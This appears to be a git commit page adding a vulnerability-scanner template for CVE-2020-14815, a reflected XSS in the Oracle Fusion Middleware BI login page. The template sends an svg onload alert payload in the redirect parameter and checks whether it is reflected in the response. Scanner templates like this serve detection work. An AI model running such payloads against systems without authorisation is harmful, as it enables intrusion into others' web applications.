Create CVE-2020-14815.yaml
parent
3cf5167077
commit
a273c87c2e
|
@ -0,0 +1,20 @@
|
|||
id: CVE-2020-14815
|
||||
|
||||
info:
|
||||
name: Oracle Fusion Middleware XSS
|
||||
author: Shine
|
||||
severity: medium
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/bi-security-login/login.jsp?msi=false&redirect="><svg/onload=alert(1)>
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "value=<svg/onload=alert(1)>"
|
||||
part: body
|
Loading…
Reference in New Issue